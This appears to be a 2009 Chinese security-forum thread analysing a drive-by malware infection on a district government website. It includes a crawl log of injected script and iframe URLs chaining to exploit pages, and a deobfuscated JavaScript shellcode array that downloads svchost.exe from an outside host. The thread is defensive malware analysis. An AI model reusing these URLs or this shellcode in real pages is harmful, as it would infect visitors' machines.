http://www.shrd.gov.cn/（沈河区人大网站） bbs.ikaka.com

networkedition - 2009-8-4 13:45:00

Log is generated by FreShow.
[wide]http://www.shrd.gov.cn/news/showfiles.asp?id=4
[script]http://qvoev323.cn/c.js
[frame]http://x.52av.biz/1/google.htm
[frame]http://59.34.197.156/aa/a3a.htm
[frame]http://59.34.197.156/aa/360.htm
[frame]http://59.34.197.156/aa/he.htm
[script]http://59.34.197.156/aa/h.js
[object]http://kapa8080.com/svchost.exe
[frame]http://59.34.197.156/aa/test.htm
[script]http://59.34.197.156/aa/ly.jpg
[object]http://kapa8080.com/svchost.exe
[script]http://59.34.197.156/aa/ly3.jpg
[script]http://59.34.197.156/aa/ly1.jpg
[frame]http://59.34.197.156/aa/02.htm
[script]http://59.34.197.156/aa/02.js
[object]http://kapa8080.com/svchost.exe
[frame]http://59.34.197.156/aa/pp.htm
[frame]http://59.34.197.156/aa/p.htm
[frame]http://59.34.197.156/aa/pef.pdf
[object]http://kapa8080.com/svchost.exe
[frame]http://59.34.197.156/aa/f.htm
[frame]http://59.34.197.156/aa/of.htm
[script]http://59.34.197.156/aa/a.js
[object]http://kapa8080.com/svchost.exe
[frame]http://59.34.197.156/aa/r.htm
[script]http://59.34.197.156/aa/r.js
[object]http://kapa8080.com/svchost.exe
[frame]http://59.34.197.156/aa/r.html
[script]http://59.34.197.156/aa/url.js
[script]http://59.34.197.156/aa/rl.js
[object]http://kapa8080.com/svchost.exe
[script]http://59.34.197.156/aa/\"http:\/\/js.tongji.linezing.com\/1137761\/tongji.js\"
[script]http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284
[frame]http://59.34.197.156/aa/a3a.htm
[frame]http://59.34.197.156/aa/a3a.htm
[frame]http://59.34.197.156/aa/a3a.htm
[script]http://qvoev323.cn/c.js

用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)

backway - 2009-8-4 18:14:00

刚学解马，hxxp://59.34.197.156/aa/ly.jpg 里应该是带密匙(BD?)的shellcode吧？
输入密匙BD，解出来的东西：

[复制到剪贴板]

CODE:

varly1='邋邋V鰩t??壎_GV窾VBBB?';
varly2='_d?婡媝瓔h嬿jY杈愨鴋3';
varly3='2hUserT婩杈嬭jY铻怡hon';
varly4='hurlmT吚uhonhurlmT婩鑾';
varly5='嬭jY鑞怡hl32hshelT婩鑟';
varly6='嬭jY鐿怡侅嬡伱€jjSj';
varly7='V\3繞€<u\a.e荄xe3蒕Q';
varly8='SWQ3缷FX?凐椋恓jjjj';
varly9='h繱婩$?塅`jPV(塅d婩`jj';
varly10='jjjPV,jjjhPV<塅x婲d';
varly11='€|磘 €|t€t粹雺唨荈p';
varly12='荈tjjj婩`PV8媶€j峃';
varly13='tQvpPv`V0v`V4vxV@孄3?蹃?;
varly14='嬏凐T}?兝塍嬏嬞兠3繮QSP';
varly15='PPPPPWPPV媬T?鑕hcvwhsh';
varly16='doT婩 ?塅varly17='F?3跾SSS衻8鑰8閡亁悙悙t';
varly18='?U嬱岪噼γ锠?€?钃';
varly19='侅孅兦?2t?荊c壯O荊爀?;
varly20='饲G Q@?荊>?荊竔?荊?f犌G';
varly21='7G ?
鴇?婡媝瓔h嬿jY';
varly22='鑄愨鴋32hUserT?鑅嬭jY?;
varly23='5怡3WV?X描?[?笁_f荊';
varly24='嗝S嬡Sj@hW婩 ?X肣V媢<媡';
varly25='.x鮒媣 ?蒊A????:謙了贎';
varly26='腭;u鏭媈$輋?K媈輯?奴^Y描?;
varly27='?豺怍9鈣冓H{=2t?呥c壯OQ@??;
varly28='e椝飺2鋽?
K膷tWf
C粳踼';
varly29='馥歊??竔??f狘?瓨
鴢织汒S';
varlyaa='f[url]http://127.0.0.1/1.exeeeeeeeeeeeeeWW'[/url][/url];
varly30='f[url]http://kapa8080.com/svchost.exe'[/url][/url];

不知道对不对啊上面还有个127.0.0.1那个......

networkedition - 2009-8-5 9:08:00

varly30='f[url]http://kapa8080.com/svchost.exe'[/url][/url];
不知道这个是什么:kaka2: 网马地址不是出来了嘛:kaka6:

backway - 2009-8-5 9:17:00

师父:kaka12:
那个[url]是回复时引用代码自动出现的。。。。
解出来的是‘fhttp://kapa8080.com/svchost.exe'
http://127.0.0.1/1.exeeeeeeeeeeeeeWW这个要管么，也下载不下来....

networkedition - 2009-8-5 9:36:00

晕，http://127.0.0.1你能下载下来才怪:kaka6:，那个没有用

backway - 2009-8-5 9:40:00

:kaka12: 那个我也觉得奇怪只是纳闷为什么会出现那个可以不管了
-------
恩恩知道了谢谢师父:kaka14:

瑞星卡卡安全论坛